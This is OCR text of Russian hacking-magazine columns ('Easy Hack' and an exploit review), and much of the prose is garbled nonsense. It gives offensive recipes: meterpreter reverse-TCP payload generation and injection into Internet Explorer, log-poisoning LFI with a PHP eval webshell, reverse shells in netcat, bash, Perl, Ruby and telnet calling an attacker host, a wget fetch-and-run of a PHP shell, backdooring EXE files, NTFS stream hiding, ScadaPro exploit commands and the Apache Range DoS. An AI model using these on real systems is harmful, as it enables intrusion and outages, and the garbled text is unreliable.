0f ( (line_count==y_mouse) && (letter_address/2 x_mouse) ) font=255; ,, l•,c font=data;

равным образом был на комnлекте! выключить платок у для компьютеру, запустить HypeгTermiпal не без; сверху стройками 015200:8п:2 равно похерачить печатать, помня,

Ее да мы от тобой добавляем позже строки tick _co uпteг=О .

который единовластно байт будь по-твоему для символ, а остальной получи атрибуты. Чтобы было

Добавляем часть Mou se RefComp на для ект равным образом настраиваем его для

удобнее пробов ат ь , ваш покорный слуга напи сал преетенькую программу про вывода

нашу частоту на 00 М Гц (по умолчанию игра стоит свеч гармоника 000 МГцl- во фай­ ле ps2iпteгface увеличиваем во 0 раза значения констант DELAY100US,

DELAY20US, DELAY63CLK равно DEBOUNCE DELAY. Тепе ь мод ль готов Деrюнстрационная

nporpartrta для того

вывода машинопись а бери защита

YGA

jсом1

Закрыть nорт

Цвет символо..----------,

Цвет Фон,;.----------,

Р" Красный

Г Красный

Р" Зеленый

Г Зеленый

Р" Синий

Г Синий


ВЗЛОМ/ЕАSУНАСК

Тюри н <<GreenDog» Алексей, Digital Security

[twitter.com/antyurinl

ЗАДДОСИТЬ ВЕ&-СЕРВЕР

Eii.iatA\!tA1 ЪА,

РЕШЕНИЕ

в качестве кого крата тем, ась? инициировала пропасть заnросов сквозь серверы

При слове <<DDoS» разом всnоминается август, тот или другой оказался

nоисковика, через что атакуемый сайт nадал nод DDoS'oм. Для усиления

получи и распишись невидаль скандальным по мнению части атак, связанных не без; отказом во

равным образом ускорения выноса сайта предлагалось на качестве <<контента>> к

обслуживании. Новости особенно nестрили заголовками по отношению дырке на

загрузки подобрать файлик поболее равно стряхивать связывание nри

Apache. Неудивительно, опять-таки говорок по рукам по части DDoS'e всех основных веток веб-демона, 00% ресурсов которого были установлены на Сети. Под проблемку со гапgе'ем ко Apache памяти появился цельный пучочек

ответе через Google. Ситуация пока что паче усугублялась тем, почто на лагах

сnлойтов во различных вариациях. Правда, про пентестерских целей

SQL-инъекции, неграмотный оnасаясь, зачем его вычислят. При меры:

паче интересной оказалась задел во видескриnтак nmap'yhttp-vuln-cve2011-3192.nse (доступна держи официальном сайтеl . Не

0. https://plus.google.com/_/sharebox/

образом, атакуемый был, в соответствии с сути. анонимен, равно был в силах nроводить всякие

liпkpreview/?c=<S ITE >&t=l&_reqid=<RANDOM_NUMBER S>&rt=j

заваливая вполне ресурс, симпатия проверяет его дыряв ость.

В августе был выложен вновь единовластно любознательный скриnтик, реали­

0.

зующий DDoS при помощи Google (goo.gi/ U9c3K I. Если за nорядку, в таком случае ребята из

атакуемого сайта фиксиравались IР-адреса поисковой системы. Таким

https://images2-focus-opeпsocial.googleusercoпteпt.

com/gadgets/proxy?ur l=<S ITE >&coпtaiпer=focus

IHteam нашли пару дырок во сервисах Гугла да сообщили об зто м несравненно

следует, да им по части каким-то причинам отнюдь не ответили. И, что сие свойственный во

Здесь <SIТE>- титул атакуемого сайта,

<RANDOM_NUMBERS>-

околохакерских кругах, новость амором nопала во nаблик, истинно уже

случайное число. Подробности да видеодемонстрация доступны по части

совокупно вместе с утилитой, которой многие далеко не поленились воспользовать-

линку goo.gl/f67F1 . Интересно, зачем nосле публикации тулзы IHteam

ся . Баги были согласно своей сути nростые: посредством сервисы

специалисты Google памяти связались со ав т орами, извинились ради не­

Google допускается

подложить контент со любого сайта. Прилагаемая тулза занималась

разворотливость и, само собой, пофиксили до сей времени баги.

D: '\.pl•j'\.EBS'\.beta_l'e lease )nmap -scl•ipt=}1ttp-vнln-cve2011-3192 Starting Nmap 0.51 ( http://nmap.org ) at 0011-09-12 00:58 Nmap scan l'epo1•t fo1• ·---- --- .... --~· ( --~· _______ ) Host is нр (0.0019s latency). PORT STATE SERUICE 80/tcp open http : http-vнln-cve2011-3192: : Apache byterange filter DoS: UULNERABLE Nmap done: 0 IP address (1 host

нр)

Rнssian

-рТ:80

Standard Time

scanned in 0.80 seconds

Хе-хе-хе . Кто-то отнюдь не успел пропатчиться

ХАКЕР

01 / 054/ 001 0


EASY НАСК

ПОДМЕНИТЬ КУКИ &РАУЭЕРА

lf.•JJМi!t.ll hA J

му каналу. Н что касается смотри сколько интересно: фактически соответственно НТТР я приблизительно но можем задать Уже пару номеров я занимаемся изучением атак бери клиентов, рабо­

куки. А что такое? будет, если бы задаваемыекукибудут вмещать похожие

тающих согласно защищенному НТТРS- соединению, изыскивая возмож­

имена [а в свою очередь домены равным образом пути]? Правильный ответ-кукибудут заме­

ность натырить куки. В пролонгирование темы как получится сверху хватает

няться. Таким образом, nроведя какую-нибудь МIТМ-атаку возьми жертву,

интересное норов браузеров близ наложении кукисов с разных

дозволяется приказать ее предпринимать НТТР-соединение для серверу равным образом

протоколов [НТТР равно HTTPSI равным образом такое важное фон куков в качестве кого << domain >>.

напакостить во маргиналий ответа с него поле- << Set-Cookie>> из вредо­

Если обратится ко теории, так закраина

<<domain>>используется

в целях

носными данными. И сие замениткукиот защищенного соединения!

задания отдельного домена сиречь группы, слабо потом будут

Для что-что сие весь может возле годиться? Если удалить специфические

пускаться куки. По идее, владение повинен совмещать льгота от тавить куки

ситуации, так обе сии особенности браузеров позволяют nроводить ата­

всего-навсего держи себя. То убирать владение

ки держи клиентов. Конкретно во книжка случае, рано или поздно нате атакуемом портале

example.com

отнюдь не может помещать ~а поддо­

мены [web.example.coml иначе некоторые домены [example2.coml. Так оно да

находится ранимость <<session fixation >> [то принимать недостаток смены

вкушать . Но убирать интересная возможность- выставитькукидля домена

идентификатора пользователя затем его входа во систему], однако присутствие этом

побольше низкого уровня [а верней на группы]. Поясню нате около мере: web.

слыхом не слыхивать способ оказывать действие н а ответы через сервера кли­

example.com

может поставитькукидля

подгруппой, куки, в области из тавленны е получай

равно в

example .com. Или, во случае с example.com, будут идти

web.example.com. Запомним сие равным образом п ерейдем ко поведению браузе­

е нту. Кто-то может заме тить, ась? ба г равным образом сие го класса будет редки. Но в качестве кого крат новобрачный ваш покорный слуга ес такую хватает крупном зарубежном сайте. По статистике, подобным недугом страдают многие средства

овраг держи различных пр отоколах. Как наш брат знаем, куки, установленные в области

[особенно интернет-магазины] , идеже предусмотрена достижимость вы­

HTTPS вместе с флагом <<Sec uгe>>, будут представляться исключительно соответственно защищен но-

полнять какие-то образ действий предварительно входа на систему.

ИНЪЕКТИРОВАТЬ ...СВОЙ КОД

В ПРОИЭВОЛЬНЫИ ПРОЦЕСС 1. Генерим настоятельный нам mеtегргеtег геvегsе -шеллкод да коди­

Если брать остросовременный файрвол, ведь сделано сие сделано малограмотный просто-напросто про­

руем его на правильном виде:

грамма интересах блокировки входящих да исходящих портов. Бранд­ мауэры nроверяют, какое прямо прибавление пытается выбраться через те дырочки , которые остаются открытыми во системе. Усло­

вимся вместе с задачей . Доnустим, наш брат имеем пользовательский доступ к серверу на какой-то закрытой силок равным образом нам увлекательно пойти приступом

. / msfpayload windows/meterpreter/reverse_tcp EXITFUNC;thread LPORT;SSSS LHOST;192.168.e.l R 1 ./msfencode -а х86 -е x86/al pha_mi xed -t raw BufferRegister;EAX

окружные хосты. Первым делом, вестимо же, надобно определить правила файрвала равным образом какие приложения разрешены. Если очищать воз­

0. Открываем у себя порт, чтоб обретать ко нне кт ото жертвы :

можность- смотрим самочки политики положительный момент статистику соединений

[netstat -naol. После обнаружения прил ожений да доступных им портов надо материализовать << nодмен у>> . То поглощать нам нужно,

./msfcli multi/handler PAYLOAD;windows / meterpreter/re verse_tcp EXITFUNC;thread LPORT;5555 LHOST;192.168.e.l

с целью фаер думал, который сие легальная nрограмма бин дит порт, а отнюдь не

0. Ну, а далее- инжектим шеллкод на необ ходимый нам эксплуатация [IE]:

наша зло-утилита :]. Старыми, хотя только действенными способами обхода таких фаеров яв­

ляются code да dll-injection. По сути, данными техниками да мы со тобой изменяем/

syringe. ехе -2 PYIIIIIIIIII...lVSVXEPM PID_IE

добавляем функционал на существующего легального ПО. Что еще интереснее, да мы из тобой можем уделывать сие <<на лету >>, так очищать реформировать процесс,

Здесь:

находящийся во памяти. Конечно , чтобы сего для лукнутый движение

подобную активность. Как не что-то иное происходит инъекция, автор малограмотный буду

PYIIIIIIIIII ... lVSVXEPAA- сие сгенерированный нами шеллкод; PID_IE- идентификатор процесса iexploгe.exe [можно испытать в tasklistl; -2 -режим работы syгinge.exe чтобы инъекции шеллкода на сто­

объяснять- во Сети всё-таки недурно расписано. Перейдем ко практик е.

ронний проце сс.

у нас должны существовать определенные права. Кроме того, надлежит совмещать в виду, что такое? есть такие продвинутые системы безопасности мониторят

Тулзов, реализующих инъекции, куда много. Сегодня автор сих строк

погляжу syгiпge [ Ьit.ly/IBQ E ЗD I . У н ее снедать интересная возмож­

Подсаженный во 0 Е код- <<первая сту пень >> mеtегргеtег'а, которая

ность- возлюбленная умее т корпеть не без; шеллкода м, тот или другой был сге н ерирован

исполнится равным образом nодконнектит ся для отечественный ему серверу, сообразно не без; ле ась? подгру­

на msfpayload. Если точнее, ведь не без; тем, что-то получен вместе с аргуме нтом alpha _ mixed. По следний используется во-nервых к того дай тебе п эйлоад

зятся часть модули. Далее , имея получи руках mеtегргеtег, наш брат свобо земля

отнюдь не задетектили антивирусы, а второе воеже пользоваться мочь

роутинга. И однако сие на патрулирование файрвала да антивируса

отразить пэйлоад во виде текстовой строки . Syгinge- сие по образу и подобию

можем расширить атаку да возьми окружные хосты, используя внутренние резервы

:1.

Стоит отметить, зачем у Syгiпge глотать прочие режимы работы. Если

утилиты shellcodeexec [мы в отношении нем сделано писали], однако позволяющий

пускать в дело <<-3>>, так syгinge короче инъектировать лично во себя [то

выполнить инъект пэйлоада никак не всего-навсего во себя, так равным образом на только сколько не какой угодно про­

принимать хорошенького понемножку подвизаться по образу shellcodeexec]. Режим << -1 >> в свою очередь интере­

цесс. Имея на запасе такую тулзу, ты да я можем выходить с системы.

сен, симпатия инъектирует во со стороны nроцесс DLL'кy, почто может являться

Рассмотрим пример. Мы определили, почто у lnteгnet Ехрlогег'а убирать

полезно. Как автор знаем, со через

msfpayload

автор можем не без; г енери­

выполнимость выхода на Сеть. Попроб уем проинжектить, ко примеру,

ровать DLL'кy от необходимым нам пэйлоадом . Другими словами, сие

mеtегргеtег на засунутый

многовариантный вариант, правда, дьявол похуже первого , приближенно во вкусе DLL'ки на

IE

да образовать связывание не без; любым

хостом. На пра ко подергивание е э в таком случае довольно смотреть к примеру так:

ХАКЕР

01 / 054/20 01

основ ном мониторятся равным образом палятся антивирусами бери уро вн е ФС.


ВЗЛОМ/ EASY НАСК

ПОЛУЧИТЬ ДОСТУП К WEB-CEPBEPY, ИМЕЯ LFI-УЯЗВИМОСТЬ В СКРИП Т Е

LFI [Local File lnclusionl- достато ч так расnространен н ая дырка,

:cg~~

а~:

nрисущая скриnтовых языкам, а благодаря этому мешковато расnространенная на

<-~:-.;.

~-·г.:..fs_:::::~::rr::._ , :

<:~~;

~~а- r:_~~:.=Fз

Сети . Как известно, скриnтовые языки nозволяют получи лету nодгружать

;...r:с-::.з:?

::.-::::--._-=::::. <:t:.:-.:;: -:: .. а:..,:_~:::::::"'"::..' ;

на начаточный схема часть сценарии, в чем дело? много раз исnользуется nро­

, ; :>

:::.~2 . :..s: . :..э: . :..2S< 'з

~азз·;::::d:

->1:..92.:..6:.:..::<.:..29 '.=:

;:с.з.з···:::з:

: ..

[

граммистами.

Проблема, вроде сие обыкновенно бывает, кроется во недостаточной

nроверкеnользовательского ввода . Как nодтиn инклуда,

Ввод им ко од вм е сто лоrи сверху

LFI nо ­

зволяет nодгрузить контент лишь со того а хоста [в награда ото RFII. Но nодгрузка скриnтов- снова невыгодный выnолнение команд для сервере.

умолчанию то и дело достуnен чтобы чтения всем. П робуем авторизиро­

Классический сnособ nерейти для удаленному ваша милость n олнению команд ­

ваться нате тестовой машине, ис n ользуя з н акомые искажение н ды:

подложить какой-то шифр на обложка получай сервере, а дальше подг р уз равно ть дан н ый файл путем

LFI. Чаще всего делов исnользуются логфайлы веб-сервера.

<? ph p eva l ($_GET[ cmd ] ); ?>

Отnравляем держи сервер заnрос от необходимым кодом, спирт сохра­ В итоге nолучаем заnись во лагах, которую наша сестра можем инклудить .

няется во журнале- равным образом автор сих строк его nодгружаем. Но гэг нынешний хватит

Стоит заметить равным образом крайность сего сnособа. Во-nервых, логфайл невыгодный

старый. Что глотать новенького? Могу поставить « вариацию бери тему »

во всякое время достуnен инклуду [по разным nричинамl, а во-вторых, nере­

вместе с исnользованием логов авторизаций SSH-cepвepa. Если держи атакуемом сервере убирать черный

OpenSSH , ведь автор сих строк можем

даваемаякоманда выполнитьсятрижды,таккакзаnисейотодного

nодключиться ко нему, указав во качестве имени nользователя никак не ­

коннекта короче аж три. Кстати говоря, во самом файле логов

огибаемый нам код. А а там на правах обычно: подложить его инклудом.

то и дело хранится интересная инфа, которая может nозволить раз­

Файл логов обыкновенно лежит на /vaг/log/auth . log и, который существенно про нас, по мнению

крутить атаку получай иные аппаратура локальной сети.

'~j•

-1 ,_,с, -1- -1·' l•t

··1•

-1

,_,с,

,,Ji•ll-11.'c,J -1- -1:: l•t ooli•II-11_:.J

-1

,_,с,

-1::

F,;ll~,J

lJ,~I · ··j·lij• ~,.;l •!_•:ETI• m•IJ' -,_ f10111 0~•.' 0•:.:0:.1'~•0 0 ,; .. ,;~ t"' lli.dll•l ti'~J · ' j•I1J• ~,,;1•!_••EТI(m•ll' '· fгom 0"=•2 0•5:0:

F.;ll~•l

j•.;_,ow•_,,,j f,_,,

I11<1l1,J

0с•о

0 po1t

0•:·З

0'") 0

:::32~•0

.,,

j,_· ·:~1•

-

-.

с,,:,

l•t _,oJi•ll-11-'cl

lll•dll•l

llo<?Г-

'j•I1J•

<?,,;1•!_•-•EТicm•ll'

'· f10111

0с•.:.

рогt

::·:.29

Н а ш ко од во логах

СПРЯТАТЬ (И НЕ ТОЛЬКО) ФАЙЛЫ В NTFS

ем.ьйr.w r .... -

РЕШЕНИЕ П ростейший сnособ от n рята ть какую-то информа ц ию во

.1111

NTFS- по­

ADSI. Трюк стар во вкусе самовластно мир: ему поуже побольше 05 ле т. Те бородатые дядьки, кто именно программирова л во те г по части д ы. подтвердя т , в чем дело? сия возмож­

ность была добавлена на файловую систему интересах совместимости с системой яблочников. Сейчас альтернативные nотоки создаются редко. Кратко nро­

бегусь сообразно основным тонкостям да nримерам исnользования скрытых nотоков. Во-nервых, нет-нет да и создается обложка на системе , эмпирика заnи­

сываются во штампованный nоток $DATA . Любой, хоть <<бесnравный»,

Админипратор: C :\Wi пdows\ System32\cmd . exe -

ложить ее во принцип равно на н ый nоток [A iternative Data Stre am, ей-ей л ее 1

0

C:'-ATI>eclю

":;one :;ect•et:;" > te:;t . txt:aaaa.txt

0

C : '-ATI>nore < te:;t . txt:aaaa.txt 11 Sone secl'ets 0 '

~ aaaa .txt - M icrosoft W ord

0 ~айл

.Qрав ка

~ид

Вп~в ка

Фор_мат

С~рвис

!абли ца

nользователь может основывать дополнительные nотоки ко файлам , nричем пусть даже ко тем, для которым у него n рав, п по части сути, нет. Во-в т орых, и н фасон ц ию на n отоках мож н по отношению н е всего лишь храни т ь, да равно вслед n ускать.

Д а л ее, n отоки позволительно соз д ава т ь на правах для фай л ам, этак равным образом для ката л огам

[ добро бы изо n осле дн их после n устить ф айл н е соответственно л учится ! . В - ч е т верт ы х,

J•I·1·2·J·З·

"зоmе

I

·4·

J

·S·

J

·6•

J

·7·

0

·8·

0

·'3·

зе сr е tз"

размер настоя щ его фай л а н е мен аз многогрешный ется, а прово д ник н е отобра ­ жает доnолнительных потоков. В-nятых, nри n ересылке файло на , наnример, согласно почте alias возьми флешку, коnируется всего лишь стереотипный

nоток. То принимать автор имеем будет ругня т овый сnособ про сокрытия инфы, наnример, получи и распишись работе. Малварь сим способом равно как nользует­ ся, а на антивирусов

Читае м приполнщик н ые потоки, используя ссьrлки

ADS давнёшенько отнюдь не nроблема . Теnерь nрактиче­

ские присутствие меры.

Записываем слова на внеочередной сель

- secrets.txt ec ho "some secret s" > t est . t xt :secret s. t xt

Читаем т екст изо потока secrets . txt more < test.txt: secrets.txt notepad.exe test.txt :secrets.txt

ХАКЕР

01/154/ 0011


EASY НАСК

Записываем исполняемый обложка на лавина

dir /R

type C:\windows\system32\ca1c.exe > test.txt:ca1c.exe Кстати , сызнова одна интересная фича в целях обычной жизни. Всем из­ Запускаем обложка с потока

(нужно определять совершенный путь)

start c:\test.txt:ca1c.exe wmic process call create \\.\c:\test.t xt :c a1c .exe

вестно, что такое? на *nix'ax [UFSI очищать жесткие ссылки [haгdlinkl в файлы, то кушать обложка у нас практически один, а ссылок бери него- бездна .

При нежели раскиданы они могут составлять по части всей системе. Так вишь во

NTFS такая Так в качестве кого никак не по сию пору nрограммы nоддерживают доnолнительные потоки,

способ в свою очередь есть, однако n очему-то возлюбленная <<забы л ась»

равным образом чрезвычайно неграмотный исnользуется . Единственное усечение пользу кого

NTFS-

может выступить nроблема не без; их открытием. Но возлюбленная решается следовать подсчёт

жесткие ссылки могут присутствовать всего только нате одном логическом диске. В ХР

создания символических линков вместе с nомощью

сие делается так:

mklink.

fsutil hard1ink create

mk1ink 0ink_fi1e .txt test.txt:secrets.txt Раньше встроенных сnособов пользу кого nросмотра nотоков во винде безграмотный

новая_ссылка исходный_файл

Начиная не без; Vista, сие делается утилитой mklink от аргументом '/h ':

было -теnерь а для того сего дозволительно восnользоваться стандартной

командой ради листинга директорий от аргументом /R:

mk1ink /h

новая_ссылка исходный_файл

ПОЛУЧИТЬ ШЕЛЛ СТАНДАРТНЫМИ СРЕДСТВАМИ

lf.•Jif.litfl --JЪJ

РЕШЕНИЕ Пару номеров отдавать я исследовали всякие ниндзя-трюки во кон­

Кроме того, не без; nомощью любых скриnтовых языков [регl, awk, shell да т. д . l лишенный чего каких-либо проблем реализуется шелл/реверс­

соли

ш елл.

Wind ows . Было

бы неnравильно кончить безо внимания *пiх­

системы. В н иксах в области сравнению со

Windows

стандартных возмож­

ностей nруд nруди- сквозь облигация может nрактически все. Мы ж е традиционно коснемся асnекта nолучения удаленного шелла.

Это многократно иногда необходимо, наnример, про развития атаки через какую-то небезукоризненность для сервере, позволяющую n росто выnолнять

Реверс-шелл возьми

Ruby: ruby -rsocket -е 'exit if fork;c=TCP5ocket.new("192.168.e.l", "5555");whi1e(cmd=c.gets);IO.popen(cmd,"r"){liolc.print io . read}end'

команды. Посуди сам: n олноцен ны й ш еллвсе гд а значительно удобнее, чем каждый разный палочный вид ради выnолнения команд. Ниже моя особа памяти пробегусь да nриведу основные наnравления nолуче­ ния шелла. Для nримера назначим хостом атакующего

092.168.0.1.

Начнем из самого nростого: Бинд-порта

nc -1

у жертвы вместе с

-р веве -е

Реверс - шелл.

nc -1

редиректом

на шелл

Чтобы неграмотный заморачиваться со набором заключение на рента равно nри э т ом

'/ bin / bash'

Открываем

пристань у

нажить благоустроенный ш елл, не возбраняется найти применение заготовку от

атакующего

0555

Реверс-шелл.

Perl : perl -е 'use Socket;$i="192.168.e.l";$p=5555;socket{S, PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S, sockaddr_in($p,inet_aton($i)))){open{STDIN,">&S");open( STDOUT,">&S");open{STDERR,">&5");exec{"/bin/bash -i");};'

То а самое получай

wget,

от­

правив ее получи и распишись исnолнение интерnретатору .

Открываем морские ворота

nc 092.168.e.l 0555

Если nараметр «-е>> на

у жертвы

wget -0 /tmp/shel l .php http://192.168.e.l/good_php_shell. t xt && php -f / tmp/s hell.php

'/ bin / ba sh'

netcat

недостуnен, допускается восnользоваться

nеренаnравлением ввода-вывода чрез

П оследний вариант, каковой аз многогрешный мо г у nредложить,- реверс-шелл

FIFO :

сквозь Xteгm. Подключение полноте nроисходить сверху

0001

nорт:

Реверс-шелл безо -е

mknod Ьр R; nc 092 .168.e. l 0555 е<Ьр l _! biл/bash l >bp Если

netcat

У атакующего

Xnest:l xhost +iр_жертвы

недостуnен совсем, то:

У жервы

Реверс-шелл минус

netcat /bin/bash -i > Jdev/tcp/ 092 . 068 .e.1}5555 > e<&l 0>&1

Как не грех видеть, возможностей ради nолучения шелла множество

0-й вариация вследствие telпet

mknod Ьр р ; te1net 092.168 .e.l 0555 е<Ьр

xterm -disp1ay 092 . 068.e.l : l

0

:1.

/bin/bas h l >bp

ВНЕДРИТЬ БОЕВУЮ НАГРУЗКУ В ЛЮБОЙ ЕХЕ-ФАЙЛ Не в такой мере давным-давно у

msfencode

n оявилась способ вводить

./msfpayload windows/meterpreter/reverse_tcp LPORT=5555 R 1 .jmsfencode -а хВб -t ехе - х cmd.exe -k

nэйлоады вехе-файлы минус nотери функцианала nоследних. Это отличается через того, что-то было прежде . Тогда с ехе - файла оставались,

Здесь:

в соответствии с сути , только лишь заряд [иконка, оnисание] да первобытный размер, же

-х -указание получай исnользование стороннего темnлэйта[ехе];

исполнялся только лишь nэйлоад. Теnерь а nэйлоад может исnолняться

-k- заnуск

nар.аллельно во другом n отоке nроцесса.

Все не мудрствуя лукаво равным образом малограмотный чрезвычайно заметно:]

ХАКЕР

01/154/2011

nэйлоада на отдельном nотоке.


Павлуша Александрович livinside.Ыogspot.coml

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Димуха Михайлович

0115612, дер .

Красная звездочка, д.11

ЭКСПЛОИli Каждая найденная незащищенность да любой отписанный в целях нее эксплоит всегда ближе и ближе подводят нас для пониманию природы ПО, мотивируя ко совершенствованию кода. Не будем выходить из игры с сего увлекательнейшего процесса да рассмотрим в соответствии с этому случаю несколько новых экземпляров с области эксплоитостроения.

0

Множественные уязвимости в MeasuresoftScadaPro

границы корневой директории. И до этого времени сии уязвимости были найдены

только лишь присутствие тестировании команд одной изо кате г орий. Возможность

~5

CVSSV2

011111 01 0111 0111 0111

атак ти п а переполнения сиськи существует, быстрее всего, в всех командах с подачи использования функций

sscanf да stгcpy :

011 01 [AV:N/AC:L/AU:N/C:P/I:P/A:P]

[]1Ш

!3!34!3AII09

Последнее минута во кругах информационной безопасности получается

!3!34!3A!3DD !3!34!3A!3DE

популярно взвешивать баги на различ ны х SСАОА-сис т емах, вишь равно пишущий сии строки ре­

!3!34!3А!3Е3

шили безграмотный приотставать с трендав равно описать что касается том, как дырявы

!3!34!3А!3Е4

LEA EDX,DWORD PTR SS:[ESP+ 08 ] PUSH EDX PUSH service. !3!3б7D484 "%s " PUSH EDI CALL service. !3!34192FB sscanf

они изредка бывают. П озволю себя обусловить выдержку изо Википе­

дии, для того чтобы у всех уже, наконец, отпали вопросы касательно том, зачем а такое

SCADA . SCADA- сие программный пак ет, готовленный для разработки иначе говоря обеспечения работы на реальном времени сис т ем

!3!34!3А114

сбора, обработки, отображения равно архивирования информации об

!3!34!3А118

объекте мониторинга сиречь управле ния . Короче говоря, зто автома­

!3!34!3А11А

тизированная система, которая, наравне правило, у правля ет или — или по­

!3!34!3А11С

могает приводить какими - в таком случае сложными системами да процессамина

!3!34!3А12!3

nроизводстве равно сложных технических объектах. Подобные задачи

!3!34!3А122

решает равным образом nродукт ScadaPгo ото компании Measuгesoft. Ш аловливые

!3!34!3А125

ручки хакеровдобралисьи впредь до него да обнаружили затем легко тонны

!3!34!3А128

разных уязвимостей!

!3!34!3А12А

IJ34!•Jii

LEA EDX, DWORD PTR SS:[ESP+2!3 ] MOV EAX, EDI SUB EDX, EDI LEA ESP,DWORD PTR SS:[ESP] MOV CL,BYTE PTR DS :[ EAX] MOV ВУТЕ PTR DS : [EDX+EAX],CL ADD ЕАХ, 0 TEST CL,CL JNZ SHORT serv ice. !3!34!3A12!3

Эксплоит д оступен объединение ссылке: alu i gi.oгg/poc/scadapгo 0.zip. В

В рассматриваемой системе присутствие сутствует услуга около н езамысло­

архиве лежат упражнения коман д интересах передачи серверу, не без; п омощью

ватым н азванием seгvice.exe, слушающий речные ворота п касательно д ном ером 01 034.

которых достигается эксплуатирование описанных впереди ба го в:

Этому сервису не запрещается отправлять есть такие оболочка нды , разделенные на груnпы. Группу определяет следующий объясненный бай т, а п ервый

nc SERVER 01234 < sca dapro_1b .dat

обозначает саму команду. В nроцессе бревно ти рования сих команд

; процитировать c :\boot.ini nc SERVER 01234 < scadapro_1c.dat

проверщик по-под ником aluigi сделал столько различных уязвима­ стей, что-то пусть даже никак не протестировал их все. В основ н ом э т по отношению были уязви­ мости подобно переполнения буфера, исполнения заключение равным образом выхода вслед

050

; разбудить c :\evil_file.t xt nc SERVER 01234 < scadapro_1d . dat

ХАКЕР

01 /154/ 0011


ОБЗОР ЭКСПЛОИТОВ

Accept-Eпcodiпg: Соппесtiоп:

gzip

close

Обрати напирать получи используемый тогда маргиналия Raпge. В нем указываются перекрывающиеся диапазоны байтов, изо которых в итоге соберется контент. В сочетании из используемым gziр-сжатием

IAccept-Eпcodiпg: gzip] сверху операцию сборки затрачивается слишком много памяти. Например , разве на заголовке Raпge передана тысяча диапазонов, в таком случае

Apache пытается особо сдавить весь круг диапазон,

выделяя чтобы каждой операции излишний в соответствии с размеру буфер. Спустя некоторое минута было приблизительно а обнаружено, что-то таковский а уязвимости

подвержен устарев ший маргиналия Request-Raпge, помочь кото­ рого оставлена в целях обеспечения совместимости из

Netscape Navigatoг

0-3 равным образом MSIE 0. По умолчанию эксплоит делает требования для корневой странице

сайта, равным образом позтому может сидеть малограмотный везде. Но сие легко и просто реформировать :

нужно только отредактировать роль переменной $р, на которой содер­

«HEAD 0 << HEAD /robots.txt НТТР/ 0.1 >> другими словами держи второй заведомо существующий URL.

жатся заголовки будущего запроса, например, изменить НТТР/ 0.1 >> для

Если твоя милость являешься счастливым обладателем сервера вместе с

Текст ф ункции равно з оригинального сnлоита, убивающего Apache

Арасhе ' ем , ведь рекомендую проэкзаменовать его получай наличествование зтой баги равным образом при­ нять меры. Провериться не возбраняется этакий командой: удалить

;

c :\valid_file.t xt SERVER 01234 < scadapro_1e.dat

пс

$ curl -I

привести в действие пotepad

удаления/запуска файлов.

0

" Raпge: bytes=0-1,0-2" -s www.example.com/ grep Partial

Если на возражение получи оный запрашивание приходит

Спустя ряд дней в дальнейшем релиза РоС появился соответствую­

щий устройство Metasploit, который-нибудь автоматизирует процессы создания /

<<206 Paгtial Сопtепt>>, в таком случае

тебе неграмотный посчастливилось равно твой сервер ни сияние ни заря иначе говоря на ночь глядя попадет почти раздачу. Кроме обновления веб-сервера прежде версии, идеже буква ба га исправле н а,

существует небольшую толику способов защититься. Расскажу пр по отношению них во со­

.,.,,Jdjfi Measuгesoft ScadaPгo

robots.txt

ответствующем разделе.

<=4.0.0

if.)ь11Jfi

fi•J!Iij[•J:I

Веб-сервер

Обновления через разработчиков доколе невыгодный последовало .

ДО

Apache версий 0.3.х, 0.0 . х во п лоть предварительно 0.0 .64 равно 0.2 . х вплоть

0.2.19.

fi•J!Iiit•J:I Удаленный несогласие во обслуживании веб-сервера Apache

0

Если у тебя держи сервере используется пgiпх, ведь дозволительно воспретить ему проксировать опасные заголовки из через таких директив:

~8

CVSSV2

011111 01 01 011 011111

0111

proxy_set_hea der proxy_set_header

Raпge

"" ;

Request-Raпge

IAV:N/AC:L/AU:N/C:N/I:N/A:C]

llil1Ш

Для самого

В конце августа на рассылке

Full Disclosuгe появился презанятный

скрипт, какой начисто кладет без малого всегда веб-серверы

Apache,

вплоть до самого новейших 0.2.х. Это достигается отправкой

Apache

"" ·

'

не грех принудительна лупить аншлаг

Raпge возле помощи mod_headeг (<<RequestHeadeг uпset Raпge>> и <<RequestHeadeг uпset Request-Raпge >>) либо задерживать длинные последовательности Raпge после mod_гewгite:

множества предумышленно сформированных запросов, обрабатывая

0

которые, сервер молодцом съедает всю доступную память, неграмотный давая присутствие

Вариант

зтом типично фунциклировать ни себе, ни другим сервисам во

RewriteEпgi п e Оп

системе .

Rew rit eCo пd %{ HTTP :Ra пge}

Использова ть его стоит просто:

bytes=0-[0-9]+, [NC,OR] bytes=([0-9-] ,){4,} [NC,OR] RewriteCoпd % {HTTP : Raпge} bytes=[0-9,-]+,0-(, l$) [NC] RewriteRule .? http ://% {SERVER_NAМE} / [NS, L,F]

$ perl ki l lapac he.pl www.example.com 00

Вариант

IJ:J4!•Jii Ориги н альный адрес скрипта позволительно подчистить по части ссылке goo.gi!DK1gA.

RewriteCoпd % {HTTP:Raпge}

0

RewriteEпgiпe Оп

Параметр комната крат - атакуемый хает, параметр пункт два­

RewriteCoпd %{ REQUEST_METHOD} л( HEADIGET)

величина потоков, помощью которые будут долбиться запросы. Сами

RewriteCoпd %{HTTP : Raпge}

а требования выглядят следую щим образом :

[0-9] *)+ RewriteRule

HEAD / НТТР / 0.1 Host: www.example.com Raпge: bytes=0-,5-0,5-1,5-2,5-3,5-4,< ... >,5- 0299,5-1300

ХАКЕР

01 / 054/2011

Вариант

• -

[NC] ([0-9]*-[0-9]*)(\s*,\s*[0-9]*-

[F]

З

RewriteEпgiпe Оп

051


ВЭЛОМ/ОБЗ ОРЭ КС ПЛ ОИ ТОВ

:~

0=11@11~1

Trends - [demotrend]

~ File

Edit

View

Рап

Zoom

Window

] D~ rill ~ 0~ ~ l lir 0

...

] +-

Logger Name : LOGGER 0 PRDDUCT : 05 SHIFT : 02 ВАТСН NUMBER : 02

0+ ~ 'Х 0J1o 0%ь 0 0:~ ~ fiiJ 'fl ~? IQ e1 l-t .J. :l r+-+4+- 0+-~~1

File Name : 0 00831 043015.odl

-0.99

0

0

_,J

v

0 1.50

0 0

,/1

~

/ ~ ~ nr-t!-.

//

/ _/

;У ~

р

0

,л /

} rJ

У/

Slop Time : 01/08/201014:58:15

01

0.50

/ /

0\._

Slarl Time : 01/081201014:30:15

~

0 0

,f

0

.... о

01/08/201 касательно 04:30:55.752

0

GJ0~

·-

А Н~

.J. 0. -t '"f +-< ~-+

-+!~

Help

v

0

,_

о:о~=

/

0\

n ">n

